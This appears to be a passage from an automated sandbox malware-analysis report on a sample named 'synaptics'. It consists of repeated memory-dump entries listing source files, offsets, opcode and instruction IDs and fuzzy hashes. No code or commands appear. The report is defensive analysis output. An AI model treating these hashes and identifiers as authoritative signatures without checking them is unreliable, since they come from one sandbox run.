                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f6a816b8eed2024158129d5f05473aca7baceb80bda4b2486791414de81c983a
                                                                                                                                                                                                                                    • Instruction ID: 0da53209f144fe0ec2e4b7eba46a5e1d8a9ef44775de12b7fadcbd5d5881a55f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6a816b8eed2024158129d5f05473aca7baceb80bda4b2486791414de81c983a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30A158B4A00216CFDB14CF69C980AADFBB2FF8C308B158669D855AB741D775AC85DF80
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 47d8ead186b428edbea4567efd271f142320a2e8cd5d6d86ba68139d0bab7d7a
                                                                                                                                                                                                                                    • Instruction ID: 578cc8c907e410f57a67f2bfed5f7cd0127eecb1886605275e886cf3962c03f4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47d8ead186b428edbea4567efd271f142320a2e8cd5d6d86ba68139d0bab7d7a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 147106B6A002015BD700CF59ED85B9673B8AB8932CF184265ED188BB91F721EC89DBD1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f1c4f2a0cf7a436ef11a6558fea535418a00a3b33281fcf211823e5d30f953f2
                                                                                                                                                                                                                                    • Instruction ID: 2aa19e5b5c6afc30d3364e3169dab2aa1b5d96cd2c6ce0b484296d102a7d0963
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1c4f2a0cf7a436ef11a6558fea535418a00a3b33281fcf211823e5d30f953f2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1761D1767002016BDB009E59EC80EA773A9EF89268F14422DFD18C7A51E731E9A5D7E1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA40000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca40000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d783804dd50ba8f3cf6a08a4e177dd06e49968446fbb3309f67b9a65f7f564f5
                                                                                                                                                                                                                                    • Instruction ID: 0868fb0334a6f3ba1681938285d0b885810b35d61c3cd65a533c45ad21673f73
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d783804dd50ba8f3cf6a08a4e177dd06e49968446fbb3309f67b9a65f7f564f5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E7116712093C18ED720CB06C641F66B7F5AFA6708F198429EC869BE41D330F9E9EB50
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA9A000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA9A000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca9a000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ff79cb92977928922f1917c5650abce812739f08de8d58c880a67ce51755b07a
                                                                                                                                                                                                                                    • Instruction ID: 91e6881ba8346863499ecc6395b1a465f9c807eb8a29099824654d63867de883
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff79cb92977928922f1917c5650abce812739f08de8d58c880a67ce51755b07a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4761B0B0A143018FD720CF25D886B56B7F5EB44318F14856EE84A87F91E7B6E889CB91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 152aadc39996f217945f9838be5114e9d5907692ad99af98a84844fc3f0d54a1
                                                                                                                                                                                                                                    • Instruction ID: cba4077777e590a1d46b85e64f9517b756050735b53b85dd0c9571a37aaf230b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 152aadc39996f217945f9838be5114e9d5907692ad99af98a84844fc3f0d54a1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD61F2717062006BD700DE35D995BAB73A5AB88338F54472CE9A58BBD0E731E8898BD1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB5B000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB5B000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb5b000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 39adcf8f1fc9bcf14ec44df1eb59b028eeeda23c653836009562bb931992c3cb
                                                                                                                                                                                                                                    • Instruction ID: c6bea06ec2a360dc7c488d153ead393b14656bed5dff5ba6de5975fcb76e098f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39adcf8f1fc9bcf14ec44df1eb59b028eeeda23c653836009562bb931992c3cb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 335145B1E002048FDB009FA9D945BEABBF4EF05368F044165ED0DAB752E771D994CBA2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 50efdb088adb97504b684ed5195acdeda277c270def9bd7586598799cd5fc8e3
                                                                                                                                                                                                                                    • Instruction ID: 791b756a96f87f83358dc95618171e8299bc5b1e7b73dd1b5a566b15acac16ab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50efdb088adb97504b684ed5195acdeda277c270def9bd7586598799cd5fc8e3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3051D476F401048FD708CBA9C590A9577B3BB89315B2902B4E8299BF55CA31ED87CB90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB29000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB29000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb29000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 40b4becaf3af8f3a9eaabd47e2dce42f7eaf5ba0513c36d59d95f5ae4c3cfc3a
                                                                                                                                                                                                                                    • Instruction ID: 39210e9c2a2856b0241e4b1ddddb33f600892209805ac41637a1fa766d6add4f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40b4becaf3af8f3a9eaabd47e2dce42f7eaf5ba0513c36d59d95f5ae4c3cfc3a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1617E719087848BE312CF18D4057EBB3F8FF95318F088669E98C57661F735A689CB92
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 2c9886745a29d7578f4fc85c94dde3e7c8aa7d38b5dfc903d83b7f84b3040555
                                                                                                                                                                                                                                    • Instruction ID: 47c4850bdf917496489af374945189f66508a5029b4271bfa7c04ea13e62a6d1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c9886745a29d7578f4fc85c94dde3e7c8aa7d38b5dfc903d83b7f84b3040555
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A7166B4A00202CFD715CF69C980A9EFBF1FF89308B098A69D8859B751D771A985DF80
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA79000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA79000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca79000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4f3c6878df48a5b8204e8f0e6d90f6405adaf06601b1a438998de6c151fa60e4
                                                                                                                                                                                                                                    • Instruction ID: f73f69b0e0632a8b12794b25ea09bd0e29f19324b7531e2dc5b1b1a9e96d9be0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f3c6878df48a5b8204e8f0e6d90f6405adaf06601b1a438998de6c151fa60e4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851C3757093018BC720DF69DA8055AB3F5FF85328F18466EE968C7A50D731D889CBA2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAD3000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAD3000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cad3000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e6dd07bf4800d7c7a9ad1fb7897654c1c9a620a9f48c60027eb9a44a0dcf6cf4
                                                                                                                                                                                                                                    • Instruction ID: 61229c3c44e832b975a13b4b044e2b71749434c95e9179ab0cca9aca76d4447f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6dd07bf4800d7c7a9ad1fb7897654c1c9a620a9f48c60027eb9a44a0dcf6cf4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F751C970B062428FC705CF28D840759BBF1FF89318F198569E999CBB91DB31E895CB91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA08000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA08000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca08000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: daf5f092586e46b3833f006abba613070b3ae0ffa61422e388ed91114809d222
                                                                                                                                                                                                                                    • Instruction ID: bbc82d082e0a48234d21f860791cfd346d87b9b932a5de60b2a41498147e2f59
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daf5f092586e46b3833f006abba613070b3ae0ffa61422e388ed91114809d222
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B4105717017059FD700DF54EC81B5B77E4FF8539CF14462AE86587A80E730E888CA96
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA98000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA98000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca98000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 021a8ab1c12f7c49f3dccb24ff1231923c4d00522a5467efac8bbaf459104cb8
                                                                                                                                                                                                                                    • Instruction ID: 32d682b9485460ba005b63deda7f7759c7b656effdee4b3a86a20b340a71ecd3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 021a8ab1c12f7c49f3dccb24ff1231923c4d00522a5467efac8bbaf459104cb8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA412731F001489FDB01DB69D8427FEB7F4EF86319F0842A6DA096BA81EB3559CC8791
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA94000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA94000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca94000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dc646ed02059bc50eaff1807eb5d39ef5febfa1f354d75c975461a329c17ba85
                                                                                                                                                                                                                                    • Instruction ID: df9dfc5be08a16a2ad155f4b77ac369fa19d3b26b61948ae47475ee76ede0db2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc646ed02059bc50eaff1807eb5d39ef5febfa1f354d75c975461a329c17ba85
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D411671F117165BEB008E79A8437ABB7E4AB4621CF184679C83887B40EB35D8988791
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA19000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA19000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca19000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a0d3d8e5a8faecd44e5ea427dded73e92e21777a7653de547c400b0a2da4f98e
                                                                                                                                                                                                                                    • Instruction ID: 130c11639d47ea3152663c4f1cf87d3a9210871560d1d46cf791aecc3c183847
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0d3d8e5a8faecd44e5ea427dded73e92e21777a7653de547c400b0a2da4f98e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E515AB16047018FC310CF69D540A96F3F4FB85338F18866DE8698BBA1D775E985CB91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA83000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA83000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca83000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dba615c46447d25c36d785f0b3d55d4b1ec03781bcb7aaff3641c51a13b3e017
                                                                                                                                                                                                                                    • Instruction ID: f59835d3989dd1890f8cd3ed7012d8e0a55b0ab2f10cb56e9aba72a3a313a7ea
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dba615c46447d25c36d785f0b3d55d4b1ec03781bcb7aaff3641c51a13b3e017
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44415B35A01101A7D7106F68EC05A9A7FB59F86338F240768FD2883BD1F762A899DBD1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9F5000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9F5000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9f5000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 71a7aa7df3df127e787ba13d4c7abe5d1eca8b2f34a7f10e2510064d2d369379
                                                                                                                                                                                                                                    • Instruction ID: f4d06618436c55f4e032e4510af051c8802b8819ee094202f388b6cccb1e9910
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71a7aa7df3df127e787ba13d4c7abe5d1eca8b2f34a7f10e2510064d2d369379
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA413972B00A05ABD7009F7DEC50565B7E8FF59264B10833AE83AD3F50E721E86187E1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA98000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA98000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca98000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 97b9fb8a80a3c7ffc6014d64f641b11f62097b0a108331d9f380fe3c7d8e2783
                                                                                                                                                                                                                                    • Instruction ID: b06ddbd82f9d37007ead82bf0d30e6736f18b6b9a10617a6e719601ac75093c9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97b9fb8a80a3c7ffc6014d64f641b11f62097b0a108331d9f380fe3c7d8e2783
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC41B3B1B117019FEB54CF69C9923ABB6E2BF84314F18843ED55ACBB40DB34D9858B81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA72000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA72000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca72000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 444ce4b50b55a476ab7bcdc97ebd926d91f1231a400efc9c6f196f0fdcb70519
                                                                                                                                                                                                                                    • Instruction ID: 886e59128213bf16ec00a2a37c6a9b41287ecda4da9ac62f45bc7d11a2377e50
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 444ce4b50b55a476ab7bcdc97ebd926d91f1231a400efc9c6f196f0fdcb70519
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F410339601704DBD7304E64DD4AB567BF9BF06319F280728E86597E80E331E886C7B1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA08000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA08000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca08000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a2ca9ee3ee4fbacd5220e7ca8f4ac0e36f46ddb4f98a91a7122fc47fd3d98af8
                                                                                                                                                                                                                                    • Instruction ID: 7e43e72e751195c0030ea91a1571a007430d78fea42b268f9d67d352aa528fff
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2ca9ee3ee4fbacd5220e7ca8f4ac0e36f46ddb4f98a91a7122fc47fd3d98af8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F41F631B011149BDB10CF65EC81BBEB7A8EF4435CF24406AE9199BA80DB369D5ACB94
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 37577a9cbf1141a899331f1974299873e71d3ea5cc65970e6580ef1cb954a884
                                                                                                                                                                                                                                    • Instruction ID: 92636323b2a22145c6453aa6f9b98f8aa56591633d05d40d6e8a87298fa0417c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37577a9cbf1141a899331f1974299873e71d3ea5cc65970e6580ef1cb954a884
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3441E8B59026024BD700DE65D941B9673A4AF81338F180378ED748BBD1E734E886C792
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA40000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca40000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5fda998428ca7107f276f1ccecda42d5c3a9aca8a09902012fe8aa17e9a0cefa
                                                                                                                                                                                                                                    • Instruction ID: 3bd86d56f89214271f3ff92c584d74854cbe60e453b4200f9dec061c658dc05c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fda998428ca7107f276f1ccecda42d5c3a9aca8a09902012fe8aa17e9a0cefa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1031F272B046916BD7009A76AD40B977BB9EF2235CB0CC125EC48C7E41F722F498E6E1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA40000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca40000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 963c602868689b316abe403afd48298c83651f920bdecdb0c9daa7d1879e8937
                                                                                                                                                                                                                                    • Instruction ID: ac89a6211ffa2ff460e22ba3e9324f2d16053b57618ae5c7098415dd9bc270d3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 963c602868689b316abe403afd48298c83651f920bdecdb0c9daa7d1879e8937
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD316872F016045BD6104A79ED05B9677B8EF61339F184739ED28C3BC0EB61D894A7D1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C6000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C6000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c6000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f96420b76efc102f7acf4fee9e2490b35869f61af8149fb0e4ebc7c496f7fe65
                                                                                                                                                                                                                                    • Instruction ID: 28d904a96475ad64e177b8f323cec09e489802360137fff87f1b664da148ec88
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f96420b76efc102f7acf4fee9e2490b35869f61af8149fb0e4ebc7c496f7fe65
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B419EB1A05200CFEB41CF2AC8817667BA1AF85328F098069EC59CBB91D735E944CBD3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C6000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C6000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c6000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f6f5a2337c94e7c5b4728c39ffd3c0e93a6e794c226f1976d2c8f678917206f5
                                                                                                                                                                                                                                    • Instruction ID: bcf362bab2555e12e5c349aab26d64e5d6d0add935b9c96e18fc0eb038a96648
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6f5a2337c94e7c5b4728c39ffd3c0e93a6e794c226f1976d2c8f678917206f5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13419EB1A05200CFDB41CF2AC8817667BA1AF85328F098169EC59CBB91D735E884CBD3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C6000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C6000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c6000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 20b139ed0a4e72620682f50ab7c3ee03b0df617eae84daa32acb2be181bc4dff
                                                                                                                                                                                                                                    • Instruction ID: 1b7b159916f519614359c6fe5c53939b5292199343422b2072eaa421e4c4458e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20b139ed0a4e72620682f50ab7c3ee03b0df617eae84daa32acb2be181bc4dff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D419EB1A05200CFDB41CF2AC8817667BA1AF85328F098069EC59CBB51D735E884CBD3
                                                                                                                                                                                                                                    Memory Dump Source
